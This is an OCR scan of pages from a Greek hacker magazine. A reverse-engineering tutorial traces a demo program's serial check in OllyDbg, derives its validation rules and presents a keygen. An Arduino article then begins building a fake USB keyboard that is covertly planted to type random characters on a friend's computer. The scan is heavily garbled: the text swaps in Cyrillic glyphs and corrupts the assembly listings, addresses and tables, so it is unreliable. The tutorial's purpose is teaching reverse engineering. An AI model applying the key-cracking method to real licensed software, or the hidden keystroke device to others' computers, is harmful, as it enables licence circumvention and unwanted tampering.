ΞΕΗΞΞΕΕΕΞ νοι168, 0с l@Stdetrls@TCustomBy 
ΒΒ1ΒΕΕΘΒ 
> 00402578 ΚευΡ τοτε. 66402573 


ES @8@2B 32bit ΒΙΕΕΕΕΕΕΕΕῚ 

З 32bit ΒΙΕΕΕΕΕΕΕΕῚ 

; 32bit B(FFFFFFFF) 

32bit ВІЕЕЕЕЕЕЕЕ) 

3 S2bit PEFDD@@a( FFF) 
GS ΒΒΖΒ 32bit ΒΙΕΕΕΕΕΕΕΕ] 
LastErr ERROR_SUCCES! 
8080008217 (NO,B,NE,BE,NS,PE,GE, 
empty 


Β 
empty ü 
empty Ö.G 

a 


empty 
empty 2. r9664925145541746000e+16 


empty gbo. вводвапваваодввав 
1 


empty 1. ΒΗΡΒΗΒΒΒΒΗΒΒΒΗΡΒΡΗΒΗ 
empty ee ee 
3 5 
40260 Cond 1 8 B B Err 88 
1372 Prec HERR,64 Mask 


S23C6FSa 
ΒΒ1ΞΕ4 8 
50332447 | RETURN to οἰ 188. 50332447 
624A2F9C| UNICODE "aaaaa” 

ΒΒΒΘΒΒΒΡΠ 


ГАГАГАГАГАГАГА 


аййййййь | 
90000000 
B013F4B4 Pointer to next SEH record 
664637CF| SE handler 
0040635С | КеуРготе. 0040635С 
00182458 
BABAC 
B24R2F9C UNICODE "aaaaa™ 

RETURN to ucli6ð.5Ø330EFB from vol166.@Ucl@Controls®TContre 


ΒΒ1ΞΕΕΞΩ 
ΒΘ1ΒΕ4ΕΘ 
004027C9| RETURN το KeyProte.@84627C9 from KeyProte.@a46253C 
624A2F9C| UNICODE "ааааа" 
823C6F5a 
62468CD8 
Pointer to next SEH record 
SE handler 
ΒΒ4ΒΕΞΒΕΙ KeyProte,. B884863BC 
6618F4AC 
аайййайас 
т6ЕЕ1694| RETURN to ntdll.76FF1694 from ntdll.76éF4DEF9 
ΒΒΡΠΒΞΕΘΒ 
ааййййй1 
аспа 


nefie 


ЕВР. Θα µας οδηγήσει στην apxn Tou Base Pointer της συγκεκριμένης 
συνάρτησης (στο stack). Στη συνέχεια κάνουμε double-click πάνω στην 
πρώτη στήλη, μέχρι να πάρει την μορφὴ «$-каті». Παρατηρούμε бт! στη 
θέση ΕΒΡ-30 βρίσκεται ο αριθµός 5. AUTÒ που γίνεται τελικἁ στις γραμμὲς 
00402578 και 00490257C εἶναι ο εξἠς ἐλεγχος: Αν η τιµή του ΕΒΡ-30 εἶναι 
διαφορετικἠ апо 19, τότε βγες апо την συνάρτηση. Αυτός ο αριθµός 5, 
όμως, τι μπορεἰ να εἶναι; Μα, φυσικἁ, το μήκος του κλειδιού που εἶχα- 
µε δώσει δοκιµαστικἀ! Επαναλαμβάνοντας τον ἐλεγχο HE διαφορετικὰἁ 
κλειδιά, βλέπουμε OT! αυτή η υπόθεση εἶναι αληθής. O πρώτος κανόνας, 
λοιπὸν, εἶναι От! πρέπει το κλειδὶ να έχει μήκος 19 χαρακτήρες. Αμέσως 
αμέσως το μυαλὸ Evoc ἐμπειρου reverser θα πήγαινε σε µια ора xapa- 
κτήρων της µορφής хххх-хххх-хххх-хххх. AUTO βέβαια δεν εἶναι napa μία 
(ακόµα) υπόθεση. Ας δούµε παρακάτω. 


Εικόνα 5 
Επιτέλους, 
εντοπίσαµε TOV 
αλγόριθμο ελέγχου 
γνησιότητας! 
Αναρωτιέστε 

πού βρίσκεται; 
Μα, фиока, 
πίσω απὀ τον 
Κώδικα Assembly 
που θα πρέπει 

ν΄ αναλύσουμε 
περαιτέρω... 
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48 


VHAQKE 


ÁN 


Ανάλυση, avaAuon, ανάλυση 


Οι διευθύνσεις 00940257E μέχρι 004025CD Φαίνεται OT! δεν µας ενδιαφέρουν, 
µιας και δείχνουν να µην επηρεάζουν τον ἐλεγχο του κλειδιού (κι AUTÒ 
το διαπιστώνουμε και στη συνέχεια). Όμως апо τη διεύθυνση 904025CF 
μέχρι την 00402633 μᾶλλον кат! συμβαίνει. Μάλιστα φαίνεται OT! εκεἰ πίσω 
κρύβεται κἀποιο σχέδιο! Μια αδιόρατη επανάληψη δείχνει να праүрато- 
ποιεῖται εκεὶ (βλ. εικόνα 6). 


Βάζουμε Eva breakpoint στη διεύθυνση Θθ4Θ25ΕΕ και ξεκινάμετο проүраџ- 
ра ano την αρχἡ (κάνοντας restart µε [CTRL+F2]). Δίνουμε ως κλειδί το 
123456789@abcdefghi και φτάνουμε μέχρι τη διεύθυνση 8e4e25CF (βλ. €i- 
Kova 6). Εκεἰ παρατηρούμε το εξἠς σηµαντικὀ: Στη θέση BasePointer-44 
βρίσκεται όλη η σειρἁ χαρακτήρων που δώσαμε. Θα µας πείτε: «Μα, που 
το βλέπετε το κλειδΙ;» E, λοιπὸν, εσεἰς βλέπετε TO «34333231...»; Πρὀκει- 
ται για τη 16δικἡ απεικόνιση (µε βάση τον πίνακα ASCII, www.asciitable. 
сот) των χαρακτήρων που σχηματίζουν το κλειδὶ (123456789@abcdefghi). 
Αν µελετήσετε τον κὠδικα σε assembly που ακολουθεἰ, θα διαπιστώσετε 
бт! ασχολεἰται αρκετά u’ αυτούς τους χαρακτήρες, ὁπως επἰσης και то бт! 
χωρίζεται σε окто επαναλαμβανόμενα μέρη... 


@04025CF |> ΘΕΒΕ55 Сб MOVSX EDX,BYTE PTR SS:[EBP-3A] 

00402503 |. ΘΕΒΕΔΡ BC MOVSX ECX,BYTE PTR SS:[EBP-44] 

00402507 |. 41 INC ECX 

00402508 |. 3BD1 CMP EDX,ECX 

0040250А |. 75 59 JNZ SHORT КеуРгоёе.00402635 

004025DC |. @FBE45 C7 MOVSX EAX,BYTE PTR SS:[EBP-39] 

Θ04625ΕΘ |. ΘΕΒΕ55 BD MOVSX EDX,BYTE PTR SS:[EBP-43] 

@04025E4 |. 4A DEC EDX 

@04025E5 [ Seen СМР EAX, EDX 

Θ04025Ε7 |. 75 4C JNZ SHORT KeyProte.@0402635 

004025E9 |. OFBE4D C8 MOVSX ECX,BYTE PTR SS:[EBP-38] 

004025ЕР |. @FBE5D BE MOVSX EBX,BYTE PTR SS:[EBP-42] 

@04025F1 |. 8363 FD ADD EBX, -3 

ΘΘ4Θ25Ε4 |. 3BCB CMP ECX, EBX 

004025Е6- |. 75 3D JNZ SHORT КеуРгоёе.00402635 
ο. l 58 

Θ04625Ε8 |. ΘΕΒΕ45 СӘ MOVSX EAX,BYTE PTR SS:[EBP-37] 

004025FC |. ΘΕΒΕ55 BF MOVSX EDX,BYTE PTR SS:[EBP-41] 

00402609 |. 8362 65 ADD EDX,5 


ReCunidverse it! (Olly part 11) 


“2464 24442444444444444444441444444444444444444434444444444444444444444444344454444434444444434444444444444444444444444444444444444414444444444447᾽ 


00402603 |. 3BC2 CMP EAX,EDX 
00402605 5 πο ΡΕ 3ΝΖ SHORT KeyProte.00402635 
аре 
00402607 les 8A4D CB MOV CL,BYTE PTR SS:[EBP-35] 
0040260A |. 3A4D C1 CMP CL,BYTE PTR 55:[ΕΒΡ-3Ε] 
0040260D IE US 2G) 3ΝΖ SHORT KeyProte.00402635 
OE —waO 
0040260F |: 8A45 CC MOV AL,BYTE PTR SS:[EBP-34] 
00402612 |: 3A45 C4 CMP AL,BYTE PTR SS:[EBP-3C] 
00402615 (5 115 ae 3ΝΖ SHORT KeyProte.00402635 
00402617 | @FBE55 CD MOVSX EDX,BYTE PTR SS:[EBP-33] 
0040261B | @FBE4D C3 MOVSX ECX,BYTE PTR SS:[EBP-3D] 
0040261F J: 8561 12 ADD ECX,12 
00402622 | 3BD1 CMP EDX,ECX 
00402624 | 75 ӨЕ JNZ SHORT KeyProte.00402635 
00402626 | @FBE45 СЕ MOVSX ЕАХ,ВҮТЕ PTR SS:[EBP-32] 
0040262A | @FBE55 BC MOVSX EDX,BYTE PTR SS:[EBP-44] 
0040262E |. 8362 ВА ADD EDX,@A 
00402631 | 3BC2 CMP ΕΑΧ,ΕΡΧ 
00402633 | 74 04 JE SHORT KeyProte. 00402639 


Τα παραπάνω οκτὠ µέρη αποτελούν κομμάτια του αλγορίθμου που ni- 
θανὸν να ελἐγχει τη γνησιότητα του κλειδιού. Αν μελετήσουμε Ліүо 
τον κὠδικα θα διαπιστώσουμε бт! οι τιμὲς στη μνήμη ЕВР εἶναι συνε- 
χόμενες. Apa, εἶναι πολύ πιθανό у” αποτελούν μέρος ενὸς πἰνακα. Tou 
πίνακα που, ὁπως εἰδαμε, περιέχει το δοκιµαστικὀ κλειδί που δώσαμε 
(123456789@abcdefghi). Μπορούμε λοιπὸν va συμπεράνουμε (µε μεγάλη 
πιθανότητα επιτυχίας) OT! το κλειδἰ µας καταχωρείται о’ Eva array (όπως 
αλλιώς ονομάζονται οι πίνακες). Με λίγη παραπάνω µελέτη μπορούμε 
να δημιουργήσουμε vav πἰνακα σαν αυτὸν που ακολουθεί. Στον πίνακα 
φαίνονται οι διευθύνσεις μνήμης ως προς τη θἐση ЕВР, οι χαρακτήρες 
που απαρτίζουν το δοκιμαστικὀ κλειδὶ και η θέση κάθε χαρακτήρα μέσα 
στο κλειδί... 


Διεύθυνση ως προς 44 | 43 | 42 | 41 | 40 | зу | зе | за | зс | зь | за | зо | 38 | зо | зе | 35 | за | зз | 32| 32 | 30 
Χαρακτήρας "ЕЕ πμ Б И И ЕЕ 
Θέση μέσα στο κλειδί θ]1|2|3]|α|5]ο|7|8]|9]1ϑ]1ι]12]13]|14|15]16|17|18] ` 
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Enter Serial Number 123 


. GFBE4D BC  |MOUSX _ECX, BYTE PTR 586 СЕВР-441 
INC ECX 


ars 59 JNZ SHORT KeyProte. 00402635 
- GFBE4S ΓΤ MOUSX ΕΒΧ, ΒΝΤΕ PTR SS:LEBP-391 
. GFBESS ΕΠ MOUSK EDX,.BYTE PTR SS: СЕВР-431 
4A DEC EDX 
CMP EAX,EDX 
JNZ SHORT KeyProte. 00402635 
. BFBE4D CS ΠΟμ8» ЕСА, ВҮТЕ PTR SS:LEBP-381 
- BFBESD BE HOUSX EBX,BYTE PTR SS:LEBP-421 
. 83C3 FD 
. B x, EBX 
7S 30 2 SHORT KeyProte. 00402635 
. GFBE4S C9 MOUSX EAX,BYTE PTR 55: CEBP-37] 
. GFBESS BF КОНТЕ 98 818 PTR SS: CEBP-411] 


ΠΠ4ΒΖΞΓΠΙ} rC Ей JL SHORT КеуРготе. ВАРЕН 
> ΒΕΒΕΞΞ C6 MOUSX EDX,BYTE PTR 555 ГЕВР-ЗЯЈ 


66402503 
ΕἾ 


x 

SHORT KeyProte. 06402635 

CL, BYTE PTR 55: CEBP-35] 

CL,BYTE PTR 55: CEBP-3F] 

SHORT KeyProte,. 00402635 
TE PTR 55: ГЕВ 


Embarcadero RAD 
Studio - Copyrig 
ht 2009 Embarcad 
ero Technologies 
Inc....b@.=!6 
IG. pee. 
26.6568. [58 
ΠΒ. Εἰ. sie. Se. 
re. 252, ΓΞΙΒ,ῃ Π[5, 
ЖЕШ: 


Па να καταλάβετε пос καταχωρούνται οι τιμὲς στη μνήμη και συγκε- 
κριμένα στο stack, πρέπει να 'χετε υπόψη σας ὅτι καταχωρούνται ava 4 
bytes κι ανάποδα! Αν δηλαδἠ το stack ξεκινάει апо τη διεύθυνση 44 και 
καταχωρήσουμε εκεἰ την ακολουθία χαρακτήρων 1234567890abcdefghi, 
τα δεδοµένα θα τοποθετηθούν ως εξἠς: Στα прота 4 bytes Tou stack 
(44 - 41) θα µπουν οι прото! 4 χαρακτήρες KATA την αντίστροφη σειρά, 
δηλαδή: Στη διεύθυνση 41 θα πάει ο χαρακτήρας 1, στη 42 ο χαρακτήρας 
2 κ.ο.κ. EWC τη διεύθυνση 44. Αμέσως στα επόμενα 4 byte (40 Ewe 3d) θα 
καταχωρηθούν οι επόμενοι τἐσσερεις χαρακτήρες, µε αντίστροφη σειρὰ 
και πάλι (8, 7, 6, 5). M’ αυτόν τον τρόπο θα συμπληρωθεί ολόκληρο το 
stack, μέχρι να φτάσουμε στον χαρακτήρα i. Βέβαια εκεἰ ὁπου βρίσκεται 
το i δεν τελειώνει και η 4йба των byte που καταχωρήθηκε στο stack. П’ 
αυτό, τα υπόλοιπα byte (στις θέσεις 30 και 31) Ө’ αποτελούν αυτό που 
λέμε «σκουπίδια». Θα xouv δηλαδἠ τυχαίες τιμές, που έχουν ξεμείνει 
ano προηγούμενες ενέργειες. 


4567890abcdefghi 


== 


Be ШЕЙ 


ESP ΕΕ 

Р 0018F4A0 
5Ø356FF8 vol166. 0с LeStdetrls®TCustomB 

ΒΡΙΒΕΕΞΗ 


90402508 KeyProte. 46462508 
ES 682B 32bit ΘΙΕΕΕΕΕΕΕΕῚ 


cS 0022 B(FFFFFFFF1 

55 6028 32bit ΘΙΕΕΕΕΕΕΕΕῚ 

соны τν 

GS 8528 32bit @(FFFFFFFF) Κάτω δεξιά 
εμφανίζονται 

LastErr ERROR_SUCCESS (90000000) μερικοί αριθμοί που 

99000282 (NO, NE, NE, A, NS, PO, ΒΕ, 8) μοιάζουν τυχαίοι. 


empty 
empty 
empty 


> Ωστόσο δεν εἰναι! 
9: 
empty 8. 
2. 
2 


Αποτελούν την 


t 866495145541746000е+16 бекаєвадіка ava- 
empty Í Г Ἢ 
empty Z. 92738399662244850йе+16 Παράσταση (ava 
empty πρ 9555319237967974000=+16 Χαρακτηρα ка! µε 
empty ο ο 70000416 | O βάση τον πίνακα 
4020 Cond 1 айй Err ü ñ 1 δῦ 5 ἢ ἢ ASCII) του κλει- 
διού που δώσαμε 
133325 στο πρόγραµµα. Па 
FHES να κατανοήσουμε 
66656463 πώς ακριβώς λει- 
керүү τουργεί ο έλεγχος 
γνησιότητας του 
Я κλειδιού, πρέπει va 
e sss next SEH record δούμε прооєктікӣ 
KeyProte. 00406235C TO τι συμβαίνει µε 


ARAARA αυτές τις τιμές. 


Αποκρυπτογράφηση του κὠδικα... 


Έχοντας καταλάβει τον τρὀπο που ¿xouv καταχωρηθεί στη μνήμη οι τιμὲς 
μας, θα προχωρήσουμε στην κατανόηση του αλγορίθμου που ελέγχει τη 
γνησιότητα του κλειδιού και, φυσικά, στην avanapaywyn του. Ας πιάσου- 
µε прота το μέρος 1 του κὠδικα, που εἰδαμε παραπάνω... 


Στη διεύθυνση @@4025СЕ ἑως την ΘΘ4Θ25ΡΑ (μέρος 1) συμβαίνουν τα εξής: 


1. Καταχωρεἰται στον καταχωρητή EDX η τιµή που βρίσκεται στη 
διεύθυνση EBP-3A. Με βάση το πινακἁκι μας εἶναι η τιμή που 
βρίσκεται στη θἐση 10 του array 


2. Καταχωρείται στον ΕΟΧ η τιµή που βρίσκεται στη διεύθυνση 
ΕΒΡ-44. Με βάση пал! το πινακἁκι µας, εἶναι η τιµή που βρἰσκε- 
Tal στην θέση 0 Tou array 


3. Αυξάνεται η τιµή του ΕΟΧ ката 1 
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Συγκρἰνουµε τους δύο καταχωρήτες (EDX και ECX) 


Αν δεν εἰναι ἰσοι τότε βγαίνουµε апо τη συνάρτηση. H ἐξοδος 
αυτἠ πραγματοποιείται πηγαίνοντας στη διεύθυνση 00402639 
και θέτοντας στον καταχωρητἠ ECX την τιμὴ 0. Όταν επιστρέ- 
ψει η συνάρτηση ano εκεἰ που κλήθηκε (µετην ΒΕΤΝ), θα γίνει 
ἑνας ἐλεγχος της τιμής του καταχωρητή αυτού στη διεύθυνση 
004027DC και ΘΘΔΘ275Ε. Αν εἶναι 0 τότε κἀτι δεν EXE! πάει καλά 
και µας οδηγεί στο μήνυμα λάθους, αλλιώς θα επιστρέψει 1 
που σημαίνει ὁτι ο ἐλεγχος γνησιότητας ἦταν επιτυχής... 


Αν θέλουμε αυτό να το µεταφράσουμε σε κὠδικα, το окаріфпра του θα 
ἦταν κάπως ἐτσι: 


AN array[@]+1 = array[1@] ΤΟΤΕ ΓΝΗΣΙΟ ΑΛΛΙΩΣ ΠΛΑΣΤΟ 


Εξετάζοντας µε τον ἴδιο τρόπο και τα υπόλοιπα τμήματα, εξάγουµε τους 
ακόλουθους κανόνες: 


AN array[1]-1 = array[11] ΤΟΤΕ ΓΝΗΣΙΟ ΑΛΛΙΩΣ ΠΛΑΣΤΟ 
AN array[2]-3 = array[12] ΤΟΤΕ ΓΝΗΣΙΟ ΑΛΛΙΩΣ ΠΛΑΣΤΟ 
AN array[3]+5 = array[13] ΤΟΤΕ ΓΝΗΣΙΟ ΑΛΛΙΩΣ ΠΛΑΣΤΟ 
ΑΝ array[5] = array[15] ΤΟΤΕ ΓΝΗΣΙΟ ΑΛΛΙΩΣ ΠΛΑΣΤΟ 
ΑΝ array[8] = array[16] ΤΟΤΕ ΓΝΗΣΙΟ ΑΛΛΙΩΣ ΠΛΑΣΤΟ 


ΑΝ array[7]+18 = array[17] ΤΟΤΕ ΓΝΗΣΙΟ ΑΛΛΙΩΣ ΠΛΑΣΤΟ 


AN array[@]+10 = array[18] ΤΟΤΕ ΓΝΗΣΙΟ ΑΛΛΙΩΣ ΠΛΑΣΤΟ 


Καταλήξαμε λοιπὸν στον πολυπόθητο αλγόριθμο, που πραγματοποιεί τον 
ἐλεγχο γνησιότητας του κλειδιού! Πριν προχωρήσουμε, να πούμε δύο 
πολὺ σημαντικὲς παρατηρήσεις που κάναμε για τον αλγόριθμο: 


Δεν χρησιμοποιούνται και οι 19 χαρακτήρες στον ἐλεγχο γνησιότητας. 
Χρειάζεται ωστόσο οι χαρακτήρες που σχηματίζουν το κλειδἰ να *Eivai* 
19! 


Οι πρὠτοι 9 χαρακτήρες δεν εξετάζονται. Αυτοί που εξετάζονται εἶναι О! 
υπόλοιποι 10, οι опоіо και συγκρἰνονται µε τους πρώτους. Επομένως, 
αντιστρἐέφοντας τους ελέγχους μπορούμε να ξεκινήσουμε апо µια αυθαί- 
ρετη Evviddd και να δημιουργήσουμε τους υπόλοιπους δέκα χαρακτήρες! 


Παρακάτω φαίνεται το πρὀγραμμα που αξιοποιεἰ όλα ὅσα μάθαμε µε τη 
βοήθεια του Olly, για τα κλειδιὰ προστασίας της εφαρµογἠς. Φυσικἀ, χρη- 
σιμοποιήσαμε τη γλὠσσα С (ποια ἀλλη;) και τον πηγαίο κώδικα µπορείτε 
να τον κατεβάσετε апо το http://bit.ly/dh@@2keygen. 


An’ бт! βλέπετε στο keygen.c, εμείς ξεκινάμε р’ Eva αρχικό κλειδὶ κι 
εφαρμόζουμε τους κανόνες που έχουμε εξάγει. Πράγματι, µε αρχικὀ κλει- 
di το «abcdefghi**********» τρέξαμε το πρόγραμμα και πήραμε το κλειδὶ 
«abcdefghi*ba i*fizk». Το δοκιμάσαμε και διαπιστώσαμε πως ἦταν... Yvi- 
oio! Μετὰ δώσαμε στο keygen το «1111-1111**********» και πἠραμε то 
κλειδὶ «1111-1111320.63116;». Γνήσιο κι αυτό :D Μπορείτε να δώσετε κι 
εσεἰς ὀποιο αρχικό κλειδὶ θέλετε, για να πάρετε τελικἀ Eva κλειδί που 
θα «ανοίγει» το πρὀγραµµα που φτιάξαμε στο άρθρο που αρχίζει ano τη 
σελίδα 12. 


Happy Reversing! 


Όπως οκριβώς 
μοιραζόμαστε 
τον κώδικά µας, 


> έτσι θέλουμε να 
μοιραστούμε και 

=< τις ιδέες uac! 

Γιατί λοιπόν να 

hackerspace.gr µην το κάνουμε 


Αμπατιέλου 11, Αθήνα x, ee 
πλησίον ΗΣΑΠ Ay. Ελευθέριος απο κοντα; 


Ebooks Python UnitedTransnation 


Unauthorized Hackathons 
Awmn SoftwareFreedomDay 


OpenLibrary MozillaGreece 
Melissi Fedora Hackfests 
Arduino BookCrossing 
Hellug SysAdmin OpenGarden 
OpenData Aeroponics руд 

CreativeCommons 


Μάθε περισσότερα για то hsgr, το Πρόγραμμα Εκδηλώσεων 
και πως μπορείς και εσύ να συμμετέχεις: руй оскегеросе ос 


Skill: 
intermediate 
Tags: Arduino, 


DIY, pranks, 
Programming 


` 


\. 


by giannoug 


= Ἕνας ano τους νόμους του Мёрфи λέει ὁτι όταν 
a πατάμε δύο κουμπιά ката λάθος, εκεἰνο που 
ενεργοποιείται εἶναι πάντα το ανεπιθύμητο! 


Σπάσιμο νεύρων... 
στα πιο απολαυστικά του! 


Μπορεί ὅλοι οι νόμοι του Μέρφυ να περιγράφουν 
EKVEUPIOTIKEG καταστάσεις, αλλά ο συγκεκριμένος 
πιστεύουμε От! μπορεῖ άνετα να тсакіс την 
ψυχοσύνθεση ενός χρήστη. Το διαβολάκι μέσα µας 
θα ἠθελε πάρα πολύ να Ἐεπιβάλειξκ αυτό το νόμο 

στους φίλους µας :D 
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Δεν εἶναι τρομερὰ ενοχλητικὀ όταν γράφουμε кат! στον υπολογιστή και 
πατάμε διάφορα άσχετα γράμματα; Ειδικά όταν γράφουμε µε μεγάλη Ta- 
χύτητα, τα δάχτυλα πετάγονται εὐκολα προς διάφορα άσχετα κουμπιά και 
το αποτέλεσµα εἰναι να NANKTPOAOYOUHE τις ἰδιες λέξεις Eava και ξανά! 
Φανταστείτε тора την περίπτωση που για τα ἄσχετα γράμματα δεν φταἰ- 
ει η απροσεξία µας, αλλά Κάποιος Ἄλλος (TM). Τότε ο εκνευρισμὀς εἰναι 
ακόμα μεγαλύτερος! E, λοιπὸν, quróv τον Κάποιον Άλλο (TM) θα τον 
κατασκευάσουµε και θα τον φυτέψουμε στον υπολογιστή... κάποιου ал- 
Лоо ;) Οι φίλοι µας αναμένεται v’ αρχίσουν τα ηρεμιστικἁ поло σύντομα. 
Μέχρι τότε, ὁμως, πρέπει να πάρουμε το Arduino μαζὶ µε τα απαραίτητα 
εξαρτήματα και να ξεκινήσουμε το μαγείρεμα. Παρεμπιπτόντως, кало θα 
ἠταν να πάρουμε και καμία ασπἰδα: Ὅταν αποκαλυφθούμε δεν θα µας 
σώζει τίποτα! 


Εξοπλισμός 


Еау δεν το ἐχετε αντιληφθεί, Eva ano τα μεγάλα προσόντα του 
Arduino ἐχει να κάνει µε τις βιβλιοθήκες του. Μπορούμε να βρού- 
µε µια βιβλιοθήκη για σχεδὀν οτιδήποτε περνὰ ano το νου µας. Αυτή 
τη фора, λοιπὸν, θα παίξουμε µε τη βιβλιοθήκη UsbKeyboard. Όπως 
καταλαβαίνετε, µε τη ВођӨға της το Arduino μπορεἰ να εμφανίζε- 
ται στον υπολογιστή ως πληκτρολόγιο. Φυσικά, τον ἐλεγχο αυτού 
του εικονικού πληκτρολογίου θα τον ἐχει ο κὠδικας που θα γράψουμε 
και θα εκτελεἰ το Arduino. Κάπου εδὠ νοµίζουµε бт! μπορείτε να pa- 
VTEWETE τι σκοπεύουμε να κάνουμε, ETO! δεν εἶναι; Υπομονή ὁμως... 


Па apxn θα χρειαστεἰ να πεταχτούµε ша βόλτα σε κάποιο μαγαζί µε nàs- 
KTpovika εξαρτήματα. Апо κει θα πάρουμε μερικὲς αντιστάσεις και διό- 
боис. Βλέπετε, γύρω апо το Arduino πρέπει να σχηµατίσουµε Eva μικρό 
κύκλωμα, το οποἱο θα επιτρέπει τη σύνδεση του εικονικού πληκτρολογίου 
μας µε τον υπολογιστή του θύματος. Πιο συγκεκριµένα, θα χρειαστεί να 
προμηθευτούμε τα παρακάτω εξαρτήματα: 


ο Або αντιστάσεις των 680 
ο Μία αντίσταση των 2.2ΚΩ 
ο Δύο διόδους zener στα 3.6V (0.5 watt) 


Θεωρούμε бт! Arduino υπάρχει ἠδη σε κάποιο συρτάρι µας (ачћ!), μαζί 
µε капою παλιὸ καλώδιο USB. Όσο үа τα εξαρτήματα που αναφέραμε, 
το κόστος δεν ξεπερνά το 1 ευρώ!, και δεν χρειάζεται v’ ανησυχούμε. Με 
τις αντιστάσεις και τις διόδους Ва σχηµατίσουµε ἑνα κύκλωμα που θα pE- 
τατρέπει τις τάσεις των ψηφιακών εισόδων κι εξόδων του Arduino (0 και 
5V) с’ εκείνες που προβλέπει η σύνδεση USB (0 και 3.6V). Στη συνέχεια 
θα εξετάσουμε το hardware που πρέπει να σχηµατίσουµε κι αµέσως μετὰ 
θα περάσουμε στο software. 


Το hardware 


Το κύκλωμα που οφείλουμε να σχηµατίσουµε δεν εἶναι µεγάλο, алла 
απαιτεἰ προσοχὴ και λίγη υπομονή. Ένα λάθος αρκεἰ για να un δουλὲ- 
Wel τίποτα και να µας κάνει να χτυπάμε то κεφάλι µας στον τοἰχο! То 
κὐκλωμὰ µας θα To υλοποιήσουμε σε µια breadboard και φαίνεται στην 


1. Ἠτο 1.000.000 καντάμ, ὁπου каутан ονομάζουμε το νόμισμα που ενδέχεται να χρησιμοποιούμε όταν 
διαβάζετε τις γραμμὲς αυτές. Μπορεί βέβαια να χρησιμοποιούμε ακόµα ευρώ. Ποιος ξέρει; Όχι εμείς. 


2ndo.yo vedpwv...ota πιο απολαυστικά tou! 
Αα 


εικόνα 1. Αρχικά, πριν αρχίσουμε 


την τοποθέτηση των εξαρτημάτων, καλώδιο USB 
μπορούμε να κόψουμε το пало KA- йу 
Лобо USB. Φυσικά δεν θα κὀψου- 

µε το βύσμα που συνδέεται στον 

υπολογιστή, алла το ἆλλο. Μετά, μας κκ TUTEN илин 

θα απογυμνώσουμε το κομμένο m... тт safes jasje 


акро р’ ἑνα κοπὶδι ñ κἀποιο αιχ- 
μηρό наҳаірг2, ὡστε να αποκαλυ- 
Φφθούν τα εσωτερικἁ καλωδιάκια. 
Μπροστά µας, πλέον, θα έχουμε 
va κὀκκινο, ἑνα μαύρο, Eva пра- 
суо κι Eva λευκὀ καλωδιάκι. Το 
μαύρο και το κόκκινο μεταφέρουν 
την τάση τροφοδοσίας για τη συ- 
σκευἠ USB (5V) και θα τα χρησι- 
μοποιήσουμε για την τροφοδοσία 
της κατασκευἠς µας. Προφανώς, 
τα ἄλλα δύο καλώδια μεταφέρουν 
τα δεδομένα. Το πράσινο εἶναι το 
λεγόμενο Data+ και το λευκό εἰναι 
το Data-. Αυτά τα δύο θα πρέπει va 
συνδεθούν μέσω των αντιστάσεων 
680, µε Ta ріп 2 και 4, αντὶἰστοι- 
χα. Στη συνέχεια, στην πλευρά των 
αντιστάσεων που θα συνδεθεἰὶ µε 
το καλώδιο USB πρέπει να τοποθε- 
τήσουμε και τις διόδους zener. Edw 
πρέπει να προσέξουμε την πολικὀ- 
τητα! Το ἑνα дкро ονομάζεται ка- 
θοδος (σημειώνεται µε µια λευκἠ ἡ 
μαύρη piya) και το ἀλλο (χωρίς τη 
piya) λέγεται ἀνοδος. Στο κὐκλωμά 


......» 
ο... 
«озо о о ө ө ө ө е е 


w... .......... 
ο ο.) 
*........... 
«озо о ә ә ә ө ө ө ж 
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Arduino 


= 


μας, λοιπὀν, η κάθοδος πρέπει να συνδεθεἰ στις αντιστάσεις και η ауобос Εικόνα 1 
στα OV (GND). Auth η τοποθέτηση των διόδων εξασφαλίζει OT! λες οι Μικρό κύκλωμα 
τάσεις θα φτάνουν το πολὺ ως τα 3.6V (αφού οι δίοδοι εἶναι τύπου zener ка! μάλλον απλό. 
στα 3.6V). Έτσι, τα ψηφιακὰ σήματα που στέλνει To Arduino (0 και 5V), — _ ы 
θα προσαρμόζονται σε εκεἰνα που προβλέπει ο δίαυλος USB (0 και 3.6V). шас θύρας USB! 
Κατόπιν, στο καλώδιο Data- (το λευκὀ) πρέπει να συνδέσουμε και την Ναι, σωστά KaTa- 
αντίσταση 2.2KQ, το ἄλλο акро της οποίας θα καταλήγει ото ріп 5. Тё- λάβατε, To Arduino 
λος, συνδέουµε Eva καλώδιο апо To ріп 10 του Arduino στο GND (OV). µας διαθέτει πλέον 


š A A ii ͵ A Е $ жеж " 
Μ΄’ αυτὀ το καλώδιο, συνδέοντας ñ апосиубёоутёс̧ το, θα δίνουμε σήμα шз 


στη συσκευἠ για την qnooToÀñ των τυχαίων χαρακτήρων. AUTO ñTav υπόψη σας ὁτι o 
όλο! Το Arduino µας πλέον διαθέτει και pia δεύτερη θύρα USB. Μ΄ αυτἠ προγραμματισμός 
θα συνδέεται στον υπολογιστή και θα συμπεριφέρεται ως Eva διαβολικὀ του πραγµατοποιεί- 
Πληκτρολόγιο, το οποίο θα στέλνει κάθε τόσο τυχαίους χαρακτήρες! Όλα ται «μόνον ano την 
айта, όμως, τα φροντίζει το software. on-board θύρα... 


Το software 


Για την ώρα θα πρέπει να ξεχάσουμε τη δεύτερη θύρα USB που προσθέἑ- 
cape στο Arduino. Σειρἁ έχει ο προγραμματισμός του κι αυτὸ φυσικἁ θα 
γίνει ano την original? θύρα. Εφόσον έχουμε Arduino, εἶναι σίγουρο ὁτι 


2. Προσοχή µε το μαχαίρι και το κοπίδι! Τα δάχτυλα θα µας χρειαστούν και μετά ;-) 
3. Δεν εννοούμε αυτἠν της ΑΕΚ... Xoxo! Πώς τα λέμε... ;) 
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θα έχουμε και To Arduino IDE. Eno- 
μένως, тора θα χρειαστεὶ va Ka- 
τεβάσουμµε και va εγκαταστήσουµε 
τη βιβλιοθήκη που αναφέραμε ap- 
xika. Αφού πάμε µια βόλτα ως την 
τοποθεσία 


File Edit Sketch Tools Help 


#include "UsbKeyboard.h” // H βιβλιοθήκη που χρειαζόμαστε 


#define LED 13 // Στο Pin 13 tow Arduino είναι mn http: //code.google.com/p/vusb- 

6 for-arduino 
#define SWITCH 10 Z7 Sto Pin 10 Я А ͵ 
αρκει να επισκεφθούμε την καρτε- 
λα Downloads και να κατεβάσουμε 


#define SIZE 11 // Τα μέγεθος του πίνακα (array) pe το πακέτο ZIP. Εντὸς του πακέτου 


ЖЕЙБИ. а. υπάρχουν τρεις διαφορετικὲς βι- 
int buttons[] = {KEY_D, KEY_E, КЕҮ 1, KEY_T, KEY_A, КЕҮ Н, КЕҮ А, F βλιοθήκες, αλλά εμείς χρειαζόμα- 


στε μόνο τη UsbKeyboard. Αυτή 
τη μία, λοιπὀν, δεν EXOUHE пара να 
